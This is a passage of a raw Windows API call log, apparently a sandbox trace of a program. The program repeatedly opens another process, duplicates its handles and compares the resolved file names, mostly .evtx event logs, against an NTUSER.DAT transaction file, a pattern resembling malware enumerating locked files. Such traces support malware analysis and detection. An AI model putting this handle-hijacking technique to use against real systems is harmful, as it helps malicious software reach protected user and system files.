0x0 [0154.607] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.607] CloseHandle (hObject=0x670) returned 1 [0154.607] _wcsicmp (_Str1="\\Microsoft-Windows-Dhcp-Client%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.607] CloseHandle (hObject=0x680) returned 1 [0154.608] CloseHandle (hObject=0x62c) returned 1 [0154.608] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.608] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.608] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.608] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.609] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.609] CloseHandle (hObject=0x670) returned 1 [0154.609] _wcsicmp (_Str1="\\Microsoft-Windows-OfflineFiles%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.609] CloseHandle (hObject=0x680) returned 1 [0154.610] CloseHandle (hObject=0x62c) returned 1 [0154.610] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.610] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.610] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.610] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.611] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.611] CloseHandle (hObject=0x670) returned 1 [0154.611] _wcsicmp (_Str1="\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.611] CloseHandle (hObject=0x680) returned 1 [0154.611] CloseHandle (hObject=0x62c) returned 1 [0154.611] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.611] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.612] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.613] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.613] CloseHandle (hObject=0x670) returned 1 [0154.613] _wcsicmp (_Str1="\\Microsoft-Windows-Winlogon%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.613] CloseHandle (hObject=0x680) returned 1 [0154.613] CloseHandle (hObject=0x62c) returned 1 [0154.613] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.613] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.613] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.614] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.614] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.614] CloseHandle (hObject=0x670) returned 1 [0154.614] _wcsicmp (_Str1="\\Microsoft-Windows-User Profile Service%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.614] CloseHandle (hObject=0x680) returned 1 [0154.615] CloseHandle (hObject=0x62c) returned 1 [0154.615] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.615] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.615] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.615] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.616] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.616] CloseHandle (hObject=0x670) returned 1 [0154.616] _wcsicmp (_Str1="\\Microsoft-Windows-BranchCacheSMB%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.616] CloseHandle (hObject=0x680) returned 1 [0154.616] CloseHandle (hObject=0x62c) returned 1 [0154.616] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.616] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.616] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.617] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.619] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.619] CloseHandle (hObject=0x670) returned 1 [0154.619] _wcsicmp (_Str1="\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.619] CloseHandle (hObject=0x680) returned 1 [0154.619] CloseHandle (hObject=0x62c) returned 1 [0154.619] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.619] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.619] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.620] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.621] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.621] CloseHandle (hObject=0x670) returned 1 [0154.621] _wcsicmp (_Str1="\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.621] CloseHandle (hObject=0x680) returned 1 [0154.621] CloseHandle (hObject=0x62c) returned 1 [0154.621] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.621] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.621] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.622] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.622] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.623] CloseHandle (hObject=0x670) returned 1 [0154.623] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.623] CloseHandle (hObject=0x680) returned 1 [0154.623] CloseHandle (hObject=0x62c) returned 1 [0154.623] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.623] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x598, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.623] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.623] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.624] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.624] CloseHandle (hObject=0x670) returned 1 [0154.624] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.624] CloseHandle (hObject=0x680) returned 1 [0154.624] CloseHandle (hObject=0x62c) returned 1 [0154.624] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.624] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.624] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.625] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.626] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.626] CloseHandle (hObject=0x670) returned 1 [0154.626] _wcsicmp (_Str1="\\Microsoft-Windows-NCSI%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.627] CloseHandle (hObject=0x680) returned 1 [0154.627] CloseHandle (hObject=0x62c) returned 1 [0154.627] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.627] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.627] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.627] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.628] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.628] CloseHandle (hObject=0x670) returned 1 [0154.628] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.628] CloseHandle (hObject=0x680) returned 1 [0154.628] CloseHandle (hObject=0x62c) returned 1 [0154.628] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.628] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.628] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.629] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.630] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.630] CloseHandle (hObject=0x670) returned 1 [0154.630] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.630] CloseHandle (hObject=0x680) returned 1 [0154.630] CloseHandle (hObject=0x62c) returned 1 [0154.630] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.630] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.631] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.633] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.633] CloseHandle (hObject=0x670) returned 1 [0154.633] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.633] CloseHandle (hObject=0x680) returned 1 [0154.633] CloseHandle (hObject=0x62c) returned 1 [0154.633] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.633] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.633] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.634] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.634] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.635] CloseHandle (hObject=0x670) returned 1 [0154.635] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Problem-Steps-Recorder.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.635] CloseHandle (hObject=0x680) returned 1 [0154.635] CloseHandle (hObject=0x62c) returned 1 [0154.635] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.635] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.635] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.636] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.636] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.636] CloseHandle (hObject=0x670) returned 1 [0154.636] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.636] CloseHandle (hObject=0x680) returned 1 [0154.637] CloseHandle (hObject=0x62c) returned 1 [0154.637] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.637] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.637] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.637] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.638] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.638] CloseHandle (hObject=0x670) returned 1 [0154.638] _wcsicmp (_Str1="\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.638] CloseHandle (hObject=0x680) returned 1 [0154.638] CloseHandle (hObject=0x62c) returned 1 [0154.638] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.638] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.638] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.639] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.640] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.640] CloseHandle (hObject=0x670) returned 1 [0154.640] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.640] CloseHandle (hObject=0x680) returned 1 [0154.640] CloseHandle (hObject=0x62c) returned 1 [0154.640] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.640] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.640] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.641] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.642] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.642] CloseHandle (hObject=0x670) returned 1 [0154.642] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkProfile%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.642] CloseHandle (hObject=0x680) returned 1 [0154.642] CloseHandle (hObject=0x62c) returned 1 [0154.642] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.642] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.642] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.643] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.644] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.644] CloseHandle (hObject=0x670) returned 1 [0154.644] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.644] CloseHandle (hObject=0x680) returned 1 [0154.644] CloseHandle (hObject=0x62c) returned 1 [0154.644] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.644] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x600, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.644] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.648] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.649] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.649] CloseHandle (hObject=0x670) returned 1 [0154.650] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkAccessProtection%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.650] CloseHandle (hObject=0x680) returned 1 [0154.650] CloseHandle (hObject=0x62c) returned 1 [0154.650] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.650] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x620, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.650] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.651] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.651] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.651] CloseHandle (hObject=0x670) returned 1 [0154.652] _wcsicmp (_Str1="\\Microsoft-Windows-WindowsBackup%4ActionCenter.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.652] CloseHandle (hObject=0x680) returned 1 [0154.652] CloseHandle (hObject=0x62c) returned 1 [0154.652] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.652] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x62c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.652] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.652] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.653] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.653] CloseHandle (hObject=0x670) returned 1 [0154.653] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.653] CloseHandle (hObject=0x680) returned 1 [0154.653] CloseHandle (hObject=0x62c) returned 1 [0154.653] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.653] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x634, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.654] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.654] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.655] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.655] CloseHandle (hObject=0x670) returned 1 [0154.655] CloseHandle (hObject=0x680) returned 1 [0154.655] CloseHandle (hObject=0x62c) returned 1 [0154.655] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.655] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x638, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.655] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.656] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.656] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.657] CloseHandle (hObject=0x670) returned 1 [0154.657] CloseHandle 